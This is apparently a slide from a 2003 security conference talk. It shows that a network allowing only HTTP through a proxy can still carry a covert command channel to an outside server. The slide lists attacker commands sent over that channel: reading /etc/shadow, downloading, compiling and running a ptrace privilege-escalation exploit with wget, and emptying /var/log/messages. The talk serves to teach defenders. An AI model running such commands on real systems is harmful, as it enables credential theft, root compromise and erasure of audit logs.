All locked down. Now that only true HTTP is allowed, we're safe, right? $ nc proxy 3128 POST http://home.my_server.net/cgi-bin/runcommands.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; ...) Host: home.my_server.net Connection: Keep-Alive Cache-Control: no-cache Content-Length: 83 uname=Linux+testy+2.4.10-bf2.4+\%231+Son+Apr+14+09\%3a53\%3acpu= 686&cpuspeed=731&memfree=103727 shadow now cat /etc/shadow ptracebug now cd /tmp; wget ...ptracebug.c; make ptracebug; ./ptracebug && echo r00ted clearlogs 10m /tmp/.../newsudo cat /dev/null > /var/log/messages
Copyright 2003, Bri Hatch of Onsight, Inc.
Presented at SecureWorld Expo, 2003.
Presentation created using vim and MagicPoint.